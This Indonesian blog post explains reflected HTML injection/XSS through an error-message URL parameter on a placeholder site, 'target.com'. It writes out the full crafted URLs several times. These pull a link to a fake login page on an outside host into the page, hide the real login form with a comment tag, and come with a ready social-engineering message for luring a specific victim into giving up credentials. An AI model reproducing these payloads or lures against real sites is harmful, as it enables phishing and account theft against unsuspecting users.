Bahaya Cross Site Scripting

Cross Site Scripting (XSS) sering dianggap ancaman yang tidak terlalu berbahaya karena tidak secara langsung berdampak pada server. Semua yang dilakukan akan berdampak di sisi klien saja. Memang benar, tetapi dengan XSS kita bisa mendapatkan keuntungan dari kelalaian seseorang.

Katakanlah ada sebuah situs ‘target.com’. Ceritanya situs ini adalah situs yang sangat beken… User mereka di proteksi ketika login (loginnya pake HTTPS). Hahah.. Kemudian ada seorang user A yang sangat misterius. Kita ingin mengetahui data dia pada situs itu. Di sadap juga ga mungkin nih.. karena loginnya make HTTPS dan pake sslstrip juga ga mungkin, soalnya target tidak satu jaringan dengan kita =P

Wew tunggu dulu, ternyata form login si target.com memiliki bug. Bug terletak di URLnya. URL situsnya kalau ada user salah login adalah seperti ini http://target.com/index.php?mod=write&msg=ERROR!%20NOBODY%20WILL%20LOGIN. Bagaimana jika kalimat setelah ‘&msg=’ saya isi dengan kata-kata lain? Misalnya seperti ini hehe iseng…

Percobaan XSS
Percobaan XSS

Gambar diatas dengan memasukkan URL ini:
http://target.com/index.php?mod=write&msg=Our%20website%20move%20to%20%3Ca%20href=%22tibandung.com/fakelogin.php%22%3Ehere%3C/a%3E.%20Please%20register%20using%20%3Cu%3ESAME%3C/u%3E%20username%20and%20password.%20Thank%20you.

Itu yang kata ‘here’ ada link ke halaman login palsu buatan kita di situs hostingan kita. Hahaha.. bisa panen user dan password kalau banyak yang ketipu =P

Tapi kurang bagus juga.. karena form login aseli masih ada disitu.. Tambahkan karakter ‘<!–‘ biar seluruh karakter setelahnya dianggap komen dan tidak ditampilkan… Gambarnya jadi lumayan ‘terpercaya’ hahaha

Percobaan XSS (Lanjut)
Percobaan XSS (Lanjut)

URL untuk menampilkan seperti diatas adalah sebagai berikut:
http://target.com/index.php?mod=write&msg=Our%20website%20move%20to%20%3Ca%20href=%22tibandung.com/fakelogin.php%22%3Ehere%3C/a%3E.%20Please%20register%20using%20%3Cu%3ESAME%3C/u%3E%20username%20and%20password.%20Thank%20you.%3C!–

Nah tinggal kasih ke target linknya.. Pakai teknik soceng sedikit.. Misalnya dengan menggunakan pesan via IM/SMS/Wall Facebook/Twit/dll:

cynth.. kok gw gak bisa login di target.com yak? Coba lu login.. nih linknya.. http://target.com/index.php?mod=write&msg=Our%20website%20move%20to%20%3Ca%20href=%22tibandung.com/fakelogin.php%22%3Ehere%3C/a%3E.%20Please%20register%20using%20%3Cu%3ESAME%3C/u%3E%20username%20and%20password.%20Thank%20you.%3C!–

Tinggal menunggu apakah target tertipu atau tidak… Apakah ini link ke domain tipuan? Ooo.. tidak.. ini adalah link ke situs target.com yang asli loooh.. Perhatikan URLnya baik-baik.. Hehe. Teknik bisa lebih diimprovisasi misalnya dengan menggunakan URL encoder, jadi URL bagian depan aja yg terbaca secara kasat mata.

Jadi untuk membobol akun si A tadi, kita tidak harus bobol dulu server target.com, tapi cukup memanfaatkan bug XSS dan juga kelalaian si A.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.